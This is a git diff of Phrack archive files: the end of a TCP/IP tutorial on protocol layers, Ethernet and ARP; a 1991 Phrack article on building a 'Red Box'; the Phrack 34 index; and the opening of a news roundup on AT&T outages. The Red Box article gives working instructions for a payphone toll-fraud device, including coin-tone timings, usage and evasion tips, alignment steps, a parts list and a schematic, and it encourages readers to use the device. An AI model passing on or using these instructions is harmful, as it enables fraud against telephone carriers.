+    1.  Introduction
+    2.  TCP/IP Overview
+    3.  Ethernet
+    4.  ARP
+
+1.  Introduction
+
+   This tutorial contains only one view of the salient points of TCP/IP,
+   and therefore it is the "bare bones" of TCP/IP technology.  It omits
+   the history of development and funding, the business case for its
+   use, and its future as compared to ISO OSI.  Indeed, a great deal of
+   technical information is also omitted.  What remains is a minimum of
+   information that must be understood by the professional working in a
+   TCP/IP environment.  These professionals include the systems
+   administrator, the systems programmer, and the network manager.
+
+   This tutorial uses examples from the UNIX TCP/IP environment, however
+   the main points apply across all implementations of TCP/IP.
+
+   Note that the purpose of this memo is explanation, not definition.
+   If any question arises about the correct specification of a protocol,
+   please refer to the actual standards defining RFC.
+   The next section is an overview of TCP/IP, followed by detailed
+   descriptions of individual components.
+
+2.  TCP/IP Overview
+
+   The generic term "TCP/IP" usually means anything and everything
+   related to the specific protocols of TCP and IP.  It can include
+   other protocols, applications, and even the network medium.  A sample
+   of these protocols are: UDP, ARP, and ICMP.  A sample of these
+   applications are: TELNET, FTP, and rcp.  A more accurate term is
+   "internet technology".  A network that uses internet technology is
+   called an "internet".
+
+2.1  Basic Structure
+
+   To understand this technology you must first understand the following
+   logical structure:
+
+                     ----------------------------
+                     |    network applications  |
+                     |                          |
+                     |...  \ | /  ..  \ | /  ...|
+                     |     -----      -----     |
+                     |     |TCP|      |UDP|     |
+                     |     -----      -----     |
+                     |         \      /         |
+                     |         --------         |
+                     |         |  IP  |         |
+                     |  -----  -*------         |
+                     |  |ARP|   |               |
+                     |  -----   |               |
+                     |      \   |               |
+                     |      ------              |
+                     |      |ENET|              |
+                     |      ---@--              |
+                     ----------|-----------------
+                               |
+         ----------------------o---------
+             Ethernet Cable
+
+                  Figure 1.  Basic TCP/IP Network Node
+
+   This is the logical structure of the layered protocols inside a
+   computer on an internet.  Each computer that can communicate using
+   internet technology has such a logical structure.  It is this logical
+   structure that determines the behavior of the computer on the
+   internet.  The boxes represent processing of the data as it passes
+   through the computer, and the lines connecting boxes show the path of
+   data.  The horizontal line at the bottom represents the Ethernet
+   cable; the "o" is the transceiver.  The "*" is the IP address and the
+   "@" is the Ethernet address.  Understanding this logical structure is
+   essential to understanding internet technology; it is referred to
+   throughout this tutorial.
+
+2.2  Terminology
+
+   The name of a unit of data that flows through an internet is
+   dependent upon where it exists in the protocol stack.  In summary: if
+   it is on an Ethernet it is called an Ethernet frame; if it is between
+   the Ethernet driver and the IP module it is called a IP packet; if it
+   is between the IP module and the UDP module it is called a UDP
+   datagram; if it is between the IP module and the TCP module it is
+   called a TCP segment (more generally, a transport message); and if it
+   is in a network application it is called a application message.
+
+   These definitions are imperfect.  Actual definitions vary from one
+   publication to the next.  More specific definitions can be found in
+   RFC 1122, section 1.3.3.
+
+   A driver is software that communicates directly with the network
+   interface hardware.  A module is software that communicates with a
+   driver, with network applications, or with another module.
+
+   The terms driver, module, Ethernet frame, IP packet, UDP datagram,
+   TCP message, and application message are used where appropriate
+   throughout this tutorial.
+
+2.3  Flow of Data
+
+   Let's follow the data as it flows down through the protocol stack
+   shown in Figure 1.  For an application that uses TCP (Transmission
+   Control Protocol), data passes between the application and the TCP
+   module.  For applications that use UDP (User Datagram Protocol), data
+   passes between the application and the UDP module.  FTP (File
+   Transfer Protocol) is a typical application that uses TCP.  Its
+   protocol stack in this example is FTP/TCP/IP/ENET.  SNMP (Simple
+   Network Management Protocol) is an application that uses UDP.  Its
+   protocol stack in this example is SNMP/UDP/IP/ENET.
+
+   The TCP module, UDP module, and the Ethernet driver are n-to-1
+   multiplexers.  As multiplexers they switch many inputs to one output.
+   They are also 1-to-n de-multiplexers.  As de-multiplexers they switch
+   one input to many outputs according to the type field in the protocol
+   header.
+
+
+         1   2 3 ...   n                   1   2 3 ...   n
+          \  |      /      |               \  | |      /       ^
+           \ | |   /       |                \ | |     /        |
+         -------------   flow              ----------------   flow
+         |multiplexer|    of               |de-multiplexer|    of
+         -------------   data              ----------------   data
+              |            |                     |              |
+              |            v                     |              |
+              1                                  1
+
+        Figure 2.  n-to-1 multiplexer and 1-to-n de-multiplexer
+
+   If an Ethernet frame comes up into the Ethernet driver off the
+   network, the packet can be passed upwards to either the ARP (Address
+   Resolution Protocol) module or to the IP (Internet Protocol) module.
+   The value of the type field in the Ethernet frame determines whether
+   the Ethernet frame is passed to the ARP or the IP module.
+
+   If an IP packet comes up into IP, the unit of data is passed upwards
+   to either TCP or UDP, as determined by the value of the protocol
+   field in the IP header.
+
+   If the UDP datagram comes up into UDP, the application message is
+   passed upwards to the network application based on the value of the
+   port field in the UDP header.  If the TCP message comes up into TCP,
+   the application message is passed upwards to the network application
+   based on the value of the port field in the TCP header.
+
+   The downwards multiplexing is simple to perform because from each
+   starting point there is only the one downward path; each protocol
+   module adds its header information so the packet can be de-
+   multiplexed at the destination computer.
+
+   Data passing out from the applications through either TCP or UDP
+   converges on the IP module and is sent downwards through the lower
+   network interface driver.
+
+   Although internet technology supports many different network media,
+   Ethernet is used for all examples in this tutorial because it is the
+   most common physical network used under IP.  The computer in Figure 1
+   has a single Ethernet connection.  The 6-byte Ethernet address is
+   unique for each interface on an Ethernet and is located at the lower
+   interface of the Ethernet driver.
+
+   The computer also has a 4-byte IP address.  This address is located
+   at the lower interface to the IP module.  The IP address must be
+   unique for an internet.
+
+   A running computer always knows its own IP address and Ethernet
+   address.
+
+2.4  Two Network Interfaces
+
+   If a computer is connected to 2 separate Ethernets it is as in Figure
+   3.
+
+                ----------------------------
+                |    network applications  |
+                |                          |
+                |...  \ | /  ..  \ | /  ...|
+                |     -----      -----     |
+                |     |TCP|      |UDP|     |
+                |     -----      -----     |
+                |         \      /         |
+                |         --------         |
+                |         |  IP  |         |
+                |  -----  -*----*-  -----  |
+                |  |ARP|   |    |   |ARP|  |
+                |  -----   |    |   -----  |
+                |      \   |    |   /      |
+                |      ------  ------      |
+                |      |ENET|  |ENET|      |
+                |      ---@--  ---@--      |
+                ----------|-------|---------
+                          |       |
+                          |    ---o---------------------------
+                          |             Ethernet Cable 2
+           ---------------o----------
+             Ethernet Cable 1
+
+             Figure 3.  TCP/IP Network Node on 2 Ethernets
+
+   Please note that this computer has 2 Ethernet addresses and 2 IP
+   addresses.
+
+   It is seen from this structure that for computers with more than one
+   physical network interface, the IP module is both a n-to-m
+   multiplexer and an m-to-n de-multiplexer.
+
+         1   2 3 ...   n                   1   2 3 ...   n
+          \  | |      /    |                \  | |      /       ^
+           \ | |     /     |                 \ | |     /        |
+         -------------   flow              ----------------   flow
+         |multiplexer|    of               |de-multiplexer|    of
+         -------------   data              ----------------   data
+           / | |     \     |                 / | |     \        |
+          /  | |      \    v                /  | |      \       |
+         1   2 3 ...   m                   1   2 3 ...   m
+
+        Figure 4.  n-to-m multiplexer and m-to-n de-multiplexer
+
+   It performs this multiplexing in either direction to accommodate
+   incoming and outgoing data.  An IP module with more than 1 network
+   interface is more complex than our original example in that it can
+   forward data onto the next network.  Data can arrive on any network
+   interface and be sent out on any other.
+
+                           TCP      UDP
+                             \      /
+                              \    /
+                          --------------
+                          |     IP     |
+                          |            |
+                          |    ---     |
+                          |   /   \    |
+                          |  /     v   |
+                          --------------
+                           /         \
+                          /           \
+                       data           data
+                      comes in         goes out
+                     here               here
+
+            Figure 5.  Example of IP Forwarding a IP Packet
+
+   The process of sending an IP packet out onto another network is
+   called "forwarding" an IP packet.  A computer that has been dedicated
+   to the task of forwarding IP packets is called an "IP-router".
+
+   As you can see from the figure, the forwarded IP packet never touches
+   the TCP and UDP modules on the IP-router.  Some IP-router
+   implementations do not have a TCP or UDP module.
+
+2.5  IP Creates a Single Logical Network
+
+   The IP module is central to the success of internet technology.  Each
+   module or driver adds its header to the message as the message passes
+   down through the protocol stack.  Each module or driver strips the
+   corresponding header from the message as the message climbs the
+   protocol stack up towards the application.  The IP header contains
+   the IP address, which builds a single logical network from multiple
+   physical networks.  This interconnection of physical networks is the
+   source of the name: internet.  A set of interconnected physical
+   networks that limit the range of an IP packet is called an
+   "internet".
+
+2.6  Physical Network Independence
+
+   IP hides the underlying network hardware from the network
+   applications.  If you invent a new physical network, you can put it
+   into service by implementing a new driver that connects to the
+   internet underneath IP.  Thus, the network applications remain intact
+   and are not vulnerable to changes in hardware technology.
+
+2.7  Interoperability
+
+   If two computers on an internet can communicate, they are said to
+   "interoperate"; if an implementation of internet technology is good,
+   it is said to have "interoperability".  Users of general-purpose
+   computers benefit from the installation of an internet because of the
+   interoperability in computers on the market.  Generally, when you buy
+   a computer, it will interoperate.  If the computer does not have
+   interoperability, and interoperability can not be added, it occupies
+   a rare and special niche in the market.
+
+2.8  After the Overview
+
+   With the background set, we will answer the following questions:
+
+   When sending out an IP packet, how is the destination Ethernet
+   address determined?
+
+   How does IP know which of multiple lower network interfaces to use
+   when sending out an IP packet?
+
+   How does a client on one computer reach the server on another?
+
+   Why do both TCP and UDP exist, instead of just one or the other?
+
+   What network applications are available?
+
+   These will be explained, in turn, after an Ethernet refresher.
+
+3.  Ethernet
+
+   This section is a short review of Ethernet technology.
+
+   An Ethernet frame contains the destination address, source address,
+   type field, and data.
+
+   An Ethernet address is 6 bytes.  Every device has its own Ethernet
+   address and listens for Ethernet frames with that destination
+   address.  All devices also listen for Ethernet frames with a wild-
+   card destination address of "FF-FF-FF-FF-FF-FF" (in hexadecimal),
+   called a "broadcast" address.
+
+   Ethernet uses CSMA/CD (Carrier Sense and Multiple Access with
+   Collision Detection).  CSMA/CD means that all devices communicate on
+   a single medium, that only one can transmit at a time, and that they
+   can all receive simultaneously.  If 2 devices try to transmit at the
+   same instant, the transmit collision is detected, and both devices
+   wait a random (but short) period before trying to transmit again.
+
+3.1  A Human Analogy
+
+   A good analogy of Ethernet technology is a group of people talking in
+   a small, completely dark room.  In this analogy, the physical network
+   medium is sound waves on air in the room instead of electrical
+   signals on a coaxial cable.
+
+   Each person can hear the words when another is talking (Carrier
+   Sense).  Everyone in the room has equal capability to talk (Multiple
+   Access), but none of them give lengthy speeches because they are
+   polite.  If a person is impolite, he is asked to leave the room
+   (i.e., thrown off the net).
+
+   No one talks while another is speaking.  But if two people start
+   speaking at the same instant, each of them know this because each
+   hears something they haven't said (Collision Detection).  When these
+   two people notice this condition, they wait for a moment, then one
+   begins talking.  The other hears the talking and waits for the first
+   to finish before beginning his own speech.
+
+   Each person has an unique name (unique Ethernet address) to avoid
+   confusion.  Every time one of them talks, he prefaces the message
+   with the name of the person he is talking to and with his own name
+   (Ethernet destination and source address, respectively), i.e., "Hello
+   Jane, this is Jack, ..blah blah blah...".  If the sender wants to
+   talk to everyone he might say "everyone" (broadcast address), i.e.,
+   "Hello Everyone, this is Jack, ..blah blah blah...".
+
+4.  ARP
+
+   When sending out an IP packet, how is the destination Ethernet
+   address determined?
+
+   ARP (Address Resolution Protocol) is used to translate IP addresses
+   to Ethernet addresses.  The translation is done only for outgoing IP
+   packets, because this is when the IP header and the Ethernet header
+   are created.
+
+4.1  ARP Table for Address Translation
+
+   The translation is performed with a table look-up.  The table, called
+   the ARP table, is stored in memory and contains a row for each
+   computer.  There is a column for IP address and a column for Ethernet
+   address.  When translating an IP address to an Ethernet address, the
+   table is searched for a matching IP address.  The following is a
+   simplified ARP table:
+
+                  ------------------------------------
+                  |IP address       Ethernet address |
+                  ------------------------------------
+                  |223.1.2.1        08-00-39-00-2F-C3|
+                  |223.1.2.3        08-00-5A-21-A7-22|
+                  |223.1.2.4        08-00-10-99-AC-54|
+                  ------------------------------------
+                      TABLE 1.  Example ARP Table
+
+   The human convention when writing out the 4-byte IP address is each
+   byte in decimal and separating bytes with a period.  When writing out
+   the 6-byte Ethernet address, the conventions are each byte in
+   hexadecimal and separating bytes with either a minus sign or a colon.
+
+   The ARP table is necessary because the IP address and Ethernet
+   address are selected independently; you can not use an algorithm to
+   translate IP address to Ethernet address.  The IP address is selected
+   by the network manager based on the location of the computer on the
+   internet.  When the computer is moved to a different part of an
+   internet, its IP address must be changed.  The Ethernet address is
+   selected by the manufacturer based on the Ethernet address space
+   licensed by the manufacturer.  When the Ethernet hardware interface
+   board changes, the Ethernet address changes.
+
+4.2  Typical Translation Scenario
+
+   During normal operation a network application, such as TELNET, sends
+   an application message to TCP, then TCP sends the corresponding TCP
+   message to the IP module.  The destination IP address is known by the
+   application, the TCP module, and the IP module.  At this point the IP
+   packet has been constructed and is ready to be given to the Ethernet
+   driver, but first the destination Ethernet address must be
+   determined.
+
+   The ARP table is used to look-up the destination Ethernet address.
+
+   4.3  ARP Request/Response Pair
+
+   But how does the ARP table get filled in the first place?  The answer
+   is that it is filled automatically by ARP on an "as-needed" basis.
+
+   Two things happen when the ARP table can not be used to translate an
+   address:
+
+     1. An ARP request packet with a broadcast Ethernet address is sent
+        out on the network to every computer.
+
+     2. The outgoing IP packet is queued.
+
+   Every computer's Ethernet interface receives the broadcast Ethernet
+   frame.  Each Ethernet driver examines the Type field in the Ethernet
+   frame and passes the ARP packet to the ARP module.  The ARP request
+   packet says "If your IP address matches this target IP address, then
+   please tell me your Ethernet address".  An ARP request packet looks
+   something like this:
+
+                ---------------------------------------
+                |Sender IP Address   223.1.2.1        |
+                |Sender Enet Address 08-00-39-00-2F-C3|
+                ---------------------------------------
+                |Target IP Address   223.1.2.2        |
+                |Target Enet Address <blank>          |
+                ---------------------------------------
+                     TABLE 2.  Example ARP Request
+
+   Each ARP module examines the IP address and if the Target IP address
+   matches its own IP address, it sends a response directly to the
+   source Ethernet address.  The ARP response packet says "Yes, that
+   target IP address is mine, let me give you my Ethernet address".  An
+   ARP response packet has the sender/target field contents swapped as
+   compared to the request.  It looks something like this:
+
+                ---------------------------------------
+                |Sender IP Address   223.1.2.2        |
+                |Sender Enet Address 08-00-28-00-38-A9|
+                ---------------------------------------
+                |Target IP Address   223.1.2.1        |
+                |Target Enet Address 08-00-39-00-2F-C3|
+                ---------------------------------------
+                     TABLE 3.  Example ARP Response
+
+   The response is received by the original sender computer.  The
+   Ethernet driver looks at the Type field in the Ethernet frame then
+   passes the ARP packet to the ARP module.  The ARP module examines the
+   ARP packet and adds the sender's IP and Ethernet addresses to its ARP
+   table.
+
+   The updated table now looks like this:
+
+                   ----------------------------------
+                   |IP address     Ethernet address |
+                   ----------------------------------
+                   |223.1.2.1      08-00-39-00-2F-C3|
+                   |223.1.2.2      08-00-28-00-38-A9|
+                   |223.1.2.3      08-00-5A-21-A7-22|
+                   |223.1.2.4      08-00-10-99-AC-54|
+                   ----------------------------------
+                   TA
+BLE 4.  ARP Table after Response
+
+4.4  Scenario Continued
+
+   The new translation has now been installed automatically in the
+   table, just milli-seconds after it was needed.  As you remember from
+   step 2 above, the outgoing IP packet was queued.  Next, the IP
+   address to Ethernet address translation is performed by look-up in
+   the ARP table then the Ethernet frame is transmitted on the Ethernet.
+   Therefore, with the new steps 3, 4, and 5, the scenario for the
+   sender computer is:
+
+     1. An ARP request packet with a broadcast Ethernet address is sent
+        out on the network to every computer.
+
+     2. The outgoing IP packet is queued.
+
+     3. The ARP response arrives with the IP-to-Ethernet address
+        translation for the ARP table.
+
+     4. For the queued IP packet, the ARP table is used to translate the
+        IP address to the Ethernet address.
+
+     5. The Ethernet frame is transmitted on the Ethernet.
+
+   In summary, when the translation is missing from the ARP table, one
+   IP packet is queued.  The translation data is quickly filled in with
+   ARP request/response and the queued IP packet is transmitted.
+
+   Each computer has a separate ARP table for each of its Ethernet
+   interfaces.  If the target computer does not exist, there will be no
+   ARP response and no entry in the ARP table.  IP will discard outgoing
+   IP packets sent to that address.  The upper layer protocols can't
+   tell the difference between a broken Ethernet and the absence of a
+   computer with the target IP address.
+
+   Some implementations of IP and ARP don't queue the IP packet while
+   waiting for the ARP response.  Instead the IP packet is discarded and
+   the recovery from the IP packet loss is left to the TCP module or the
+   UDP network application.  This recovery is performed by time-out and
+   retransmission.  The retransmitted message is successfully sent out
+   onto the network because the first copy of the message has already
+   caused the ARP table to be filled.
+_______________________________________________________________________________
diff --git a/phrack33/9.txt b/phrack33/9.txt
new file mode 100644
index 0000000..13a398f
--- /dev/null
+++ b/phrack33/9.txt
@@ -0,0 +1,186 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 9 of 13
+
+                  /////////////////////\\\\\\\\\\\\\\\\\\\\\
+                 ||                                        ||
+                 ||  A Real Functioning RED BOX Schematic  ||
+                 ||                                        ||
+                 ||      Written by: R.J. "BoB" Dobbs      ||
+                 ||                                        ||
+                  \\\\\\\\\\\\\\\\\\\\\/////////////////////
+
+::What is a Red Box?::
+
+     Essentially, the Red Box is a device used to fool the phone company's
+computer into thinking coins are deposited into a payphone.  Every time you
+drop a coin into a payphone, the phone signals the type of coin inserted with
+one or more bursts of a combination of 1700hz and 2200hz.  The tone bursts are
+coded as follows:
+
+Nickel : One 60 millisecond pulse
+Dime   : Two 60 millisecond pulses separated by 60 milliseconds
+Quarter: Five 35 millisecond pulses separated by 35 milliseconds
+
+::How to use it::
+
+     Simply dial a long distance number (some areas require you to stick in
+a genuine nickel first), wait for the ACTS computer to demand your cash, and
+press the "deposit" button on the red box for each coin you want to simulate.
+The coin signals are coupled from the red box into the phone with a small
+speaker held to the mouthpiece.  For local calls, either you must first deposit
+a genuine nickle before simulating more coins or place your call through the
+operator with 0+xxx+yyyy.  Use some care when the operator is on the line -
+sometimes they catch on to your beeper ploy.
+
+ ::Circuit Operation::
+
+     Each time the pushbutton is pressed, it triggers half of IC1, configured
+as a monostable multivibrator to energize the rest of the circuit for a length
+of time determined by the setting of the coin selector switch. This in turn
+starts the other half of IC1, configured as an astable multivibrator, pulsing
+on and off at regular intervals at a rate determined by the 100k pot between
+pins 12 and 13.  The output of the astable thus alternately powers of IC2,
+configured as a square wave oscillator, providing the required 1700hz and
+2200hz to the op amp which acts as a buffer to drive the speaker.
+
+::Alignment & Testing::
+
+     When you are making this thing by no means should you use a 9v AC to DC
+adapter! I also suggest not using a bread board. So be careful with that
+sodering iron. Both of these things will cause you problems.
+     For alignment, a frequency counter is desired but you can use a good
+oscilloscope as well. (These are not ABSOLUTELY necessary, but to help.) In
+order to figure frequency in Hz with your scope you can use the following
+formula.
+
+           1          S = The measurement of the wave that is on the display
+Hz =   -----------
+       S*(T*10^-6)    T = The setting of the time selector (milliseconds)
+
+              1
+Hz =  ------------------  Hz = 2198
+      9.1 * 50ms * 10^-6
+
+     Carefully remove IC1 from it's socket. Install a temporary jumper from
++9v supply to pin 14 of IC2 and temporarily disconnect the 0.01uF capacitors
+from pins 5 and 9 of IC2. Power up the circuit.  Measuring the output from pin
+5 of IC2 with the frequency counter or scope, adjust the 50k pot between pins 1
+and 6 for an output of 1700hz.  Now adjust the 50k pot between pins 8 and 13
+for an output of 2200hz from pin 9 of IC2.  Remove the temporary jumper and
+re-attach the capacitors to pins 5 and 9 of IC2, and re-insert IC1.  (Note: if
+no frequency counter is available, the outputs can be adjusted by ear one at a
+time by zero-beating the output tone with a computer generated tone of known
+precision.)
+     Next, using a multimeter, adjust the 10K pot at the cathode of the
+"quarter" diode for resistance of approximately 8K ohms.  (This sets the
+difference between the duration of the quarter pulses and those of the
+nickel/dime -- fine tuning of this ratio may be necessary durring the latter
+stages of alignment; this can be done by ear.)
+     Now, temporarily disconnect the wire between pins 5 and 10 of IC1.  Set
+coin selector switch in the "N" (nickel) position.  With the oscilloscope
+measuring the output from pin 9 of IC1, adjust the 100k pot between pins 12 and
+13 of IC1 for output pulses of 60 millisecond duration.  Reconnect the wire
+between pins 5 and 10.  (Note: If no scope is available, adjust the pulse rate
+by ear using computer generated tones for comparison.)
+     Leave the selector switch in the "N" position. Adjust the 50K pot
+labeled "Nickel" for a single beep each time the deposit pushbutton is pressed.
+     Next set the coin selector switch to "Dime". Adjust the 50k pot labelled
+"Dime" for a quick double beep each time the pushbutton is pressed.
+     Finally, set the selector to "Quarter".  Adjust the 50k pot labelled
+"Quarter" until exactly 5 very quick beeps are heard for each button
+press.  Don't worry if the quarter beeps sound shorter and faster than
+the nickel and dime ones. They should be.
+
+::Conclusion::
+
+     If all went well to this point, your red box should be completely
+aligned and functional.  A final test should now be conducted from a payphone
+using the DATL (Dial Access Test Line) coin test.  Dial 09591230 and follow the
+computer instructions using the red box at the proper prompts.  The computer
+should correctly identify all coins "simulated" and flag any anomalies.  With a
+little discretion, your red box should bring you many years of use.  Remember,
+there is no such thing as spare change!
+
+::Parts list for Red Box::
+
+2  556 Dual Timer IC's             8 0.01uF Caps
+1  741 Op Amp IC                   2 0.1uF Cap
+2  1N914 Diodes                    1 1.0uF Electrolytic Cap
+5  10k Resistors                   2 10uF Electrolytic Caps
+1  4.7k Resistor                   1 3 Position Rotary Switch
+2  100k Resistors                  1 SPST Toggle Switch
+1  100k PC Mount Pots              1 Momentary Push Button Switch (n/o)
+3  50k PC Mount Pot                1 9v Battery Clip
+1  10k PC Mount Pot                2 14 Pin Dip Socket
+2  50k Multi-Turn Pots             1 8 Pin Dip Socket
+
+::Schematic::
+       _
++9__S1/  _____________________________________________________________
+        |        |           |          |                   |   S3    |
+       R1       R2           |         R3                o  @  o      |
+        |___C1___|      _____|          |_________|/___ /   o   \___  |
+        |    ____|_____|_____|____      |     |   |\   |    |      _| |
+     _| o   |    6     4    14    |    R4    R5    D1  |    |   R9<   |
+ S2   | o  _|5                  13|_____|     |        |    |__  |    |
+        | | |                     |     |__   g        |      _| |    |
+        g |_|10       IC1        8|_      _|           |   R8<   |    |
+            |         556         | |__R6<             |__  |    |    |
+           _|9                  12|_|                    _| |    |    |
+          | |                     | |__C2__g          R7<   |    |    |
+          | |_11___3___7___2___1__|                    |    |    |    |
+          |    |   |   |   |___|_______________________|____|____|    |
+          |    |  C3   |       |                                      |
+          |__|/|   |   |      C4                                      |
+          |  |\    |   |       |                                      |
+          |   D2   g   g       g                                      |
+          |_____________________                                      |
+               |       |        |                                     |
+         ___  R10      |       R11  ___                               |
+        v   |  |       |        |  |  v                               |
+      __R12 |__|    ___|___     |__| R13__                            |
+     |        _|___|___|___|____|_        |                           |
+     |       | 1   4  14  10   13 |       |                           |
+     |       |                    |       |                           |
+     |_______|6                  8|_______|                           |
+     |    |  |        IC2         |  |    |                           |
+    C5    |__|2       556       12|__|   C6                           |
+     |       |                    |       |                           |
+     g     __|3                 11|__     g                           |
+          |  |_____7___5___9______|  |                                |
+         C7        |   |   |        C8                                |
+          |        |  C9  C10        |                                |
+          |        |   |___|         |                                |
+          g        g     |           g                                |
+                         |                                            |
+                         |            ________________________________|
+                         |           |                 |
+                         |          R14                |
+                         |           |           |\    |
+                         |           |           |  \  |
+                         |___________|___________|3   \|
+                         |           |           |    7 \
+                       C11          R15          |IC3     \
+                         |           |           |741    6/___
+                         g           g           |    4 /     |
+                                                 |    /|      |
+                          g_[speaker]___C12______|2 /  |      |
+                                              |  |/    g      |
+                                              |_______________|
+
+::Schematic Parts Code::
+
+R1:10K          R4:10K          R7:50K pot      R10:10K         R13:50K pot
+R2:10K          R5:10K          R8:50K pot      R11:10K         R14:100K
+R3:4.7K         R6:100K pot     R9:50K pot      R12:50K pot     R15:100K
+
+C1:0.01uf       C4:10uf         C7:0.01uf       C10:0.01uf
+C2:1.00uf       C5:0.01uf       C8:0.01uf       C11:0.10uf      D1 :1N914
+C3:0.01uf       C6:0.01uf       C9:0.01uf       C12:10uf        D2 :1N914
+
+S1 - SPST toggle
+S2 - Momentary push button Normally Open
+S3 - 3-position rotary switch                   g - Ground
+
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\?///////////////////////////////////////
diff --git a/phrack34/1.txt b/phrack34/1.txt
new file mode 100644
index 0000000..3b799e3
--- /dev/null
+++ b/phrack34/1.txt
@@ -0,0 +1,102 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #1 of 11
+
+                              Issue XXXIV  Index
+                              __________________
+
+                               P H R A C K  3 4
+
+                               October 13, 1991
+                              __________________
+
+                           ~Technology for Survival~
+
+
+     Welcome back to Phrack Inc.  From now on, the editorship will consist of
+Crimson Death and Dispater.  We have decided to join both our forces and pool
+our assets to make Phrack even better.  We will have accounts at various
+Internet sites, however, all file submitions should be mailed to
+phracksub@stormking.com.  If you do not have access to the Internet give Free
+Speech BBS a call.  Crimson Death will take it from there.
+
+     Special thanks this month goes out to Night Ranger for being great help!
+Also thanks to Inhuman and Laughing Gas for taking the time to submit
+material.
+
+     Phrack has never really had a distrabution BBS, but you can always get it
+on the Internet at EFF.ORG or CS.WIDENER.COM.  Off the Internet, the BBS
+distribution will be from Free Speech BBS.  Below are a list of a few other
+boards that carry all the Phracks.
+
+                     Free Speech BBS     (618) 549-4955
+                     Blitzkreig BBS      (502) 499-8933
+                     Digital Underground (812) 941-9427
+                     Pyrotechnic's Pit   (407) 254-3655
+
+     We would also like to thank the nameless numbers of BBS's out there that
+carry Phrack Inc. without their names being listed here!
+
+     In this issue of Phrack Inc. we are starting a "letters to the editor"
+section called "Phrack Loopback."  Any questions, comments, corrections, or
+problems that you the reader would like to air with Phrack publically will be
+answered there.  Loopback will also contain information such as reviews of
+other magazines, catalogs, hardware, and softare.  With Loopback we hope to
+make Phrack Inc. more interactive with our readers.
+
+     This month we had an oportunity to interview one of our "hacker hero's",
+The Disk Jockey.  We are also trying to "liven up" Phrack World News a little
+by adding some editor's comments about recent news topics.  If we get a
+positive response, we will continue doing this.  Hopefully you will respond
+with your views as well.
+
+Your Editors,
+
+               Crimson Death                          Dispater
+            cdeath@stormking.com               phracksub@stormking.com
+===============================================================================
+COMMENTS INSERTED BY SERVER:
+
+	As the server of the Phrack Mailing List, I'd like to get a few
+words in.  First, since I am currently a VERY DUMB list server, I am currently
+not very interactive.  I am working with the system administrators and owners
+to get an interactive "LISTSERV" onto this machine.  I would also like to know
+if anyone can get me access to an IP address via SLIP at an Internet site
+VERY CLOSE to the Newburgh/Poughkeepsie, NY area.  Another thing I could use
+is a Phrack SubBot for IRC.  Something small that would allow you to get
+information on the release date of the next Phrack, add your name to the
+Mailing List, find out the Index of the last issue and such.  I can handle
+awk, perl and 'C'.  An IRC connection (Not the server software) would also
+be interesting.  Another thing I heard of and am interested in is something
+that might start a seperate list.  There is a game, where you write a program
+to make a robot to fight another programmed robot.  You run these against
+each other to see who will win.  You can then modify the code to try again.
+It needs to be compatible with an IBM Risc/6000 running AIX 3.1.5 running
+patch #2006.  Help is also needed with SENDMAIL.CF configuration and etc.
+Basically, if you have something that the SERVER might be interested in,
+please mail "server@stormking.com". Also, if someone mentions that they are
+not receiving a copy when they asked to subscribe, anything that DOES bounce
+back here is automatically deleted.  For example, if something comes back
+from SUSY.THUNDER@POKER.LASVEGAS.NV.CA (Susan Lynn Headley) and I am told
+that POKER.LASVEGAS.NV.CA is not connected to CYBERPUNK.HAFNER.MARKOFF.NY.NY
+I will NOT attempt to resolve the message.
+
+					Storm King List Server
+===============================================================================
+_______________________________________________________________________________
+
+                        Phrack XXXIV  Table of Contents
+                        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ 1. Introduction to Phrack 34 by Crimson Death & Dispater
+ 2. Phrack Loopback by The Phrack Staff
+ 3. Phrack Prophile of The Disk Jockey by The Disk Jockey & Dispater
+ 4. The AT&T Mail Gateway by Robert Alien
+ 5. The Complete Guide to Hacking WWIV by Inhuman
+ 6. Hacking Voice Mail Systems by Night Ranger
+ 7. An Introduction to MILNET by Brigadier General Swipe
+ 8. TCP/IP: A Tutorial Part 2 of 2 by The Not
+ 9. Advanced Modem-Oriented BBS Security by Laughing Gas & Dead Cow
+10. PWN/Part01 by Dispater
+11. PWN/Part02 by Dispater
+_______________________________________________________________________________
diff --git a/phrack34/10.txt b/phrack34/10.txt
new file mode 100644
index 0000000..5b7f0a3
--- /dev/null
+++ b/phrack34/10.txt
@@ -0,0 +1,223 @@
+                               ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Four, File #10 of 11
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue XXXIV / Part One            PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+What We Have Got Here Today is Failure to Communicate
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Editors Comment: Dispater
+
+     With hundreds, maybe thousands of lives at stake, three airports in New
+York had to shut down due to a long distance carrier failing.  It is absolutely
+amazing how irresponsible these services were to rely on only on form of
+communication.  Where was the back up system?  This incident might not have
+happened it they would have had an alternative carrier or something as simple
+as two way radios.
+
+     Many people are running around these days screaming about how
+irresponsible AT&T was.  The real problem lyes with people in our society
+failing to take the time to learn fundamental aspects of the common technology.
+
+     It is also a shame that the people "in control" were incapable of using
+something as simple as a "port" to dial through another extender.  This
+is the kind of thing that happens when people choose to isolate themselves
+from the technological society we have today.
+
+     What follows is a compilation of several articles dealing with AT&T long
+distance carrier failures.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Thank You for abUsing AT&T                                     October 18, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~
+by Kimberly Hayes Taylor and Steve Marshall (USA Today "Phone Failure Stalls
+   Air Traffic Disruption in N.Y. Felt Nationwide")
+
+     Air traffic in and out of New York City resumed late Tuesday after a
+phone-service failure virtually shut down three airports for almost four
+hours.  Hundreds of flights coast to coast were delayed or canceled when
+controllers at John F. Kennedy, La Guardia and Newark (New Jersey) airports
+lost the link that allows communication among themselves or with other U.S.
+airports.  Communications between pilots and air-traffic controllers travel
+over telephone lines to ground-based radio equipment.  AT&T spokesman Herb
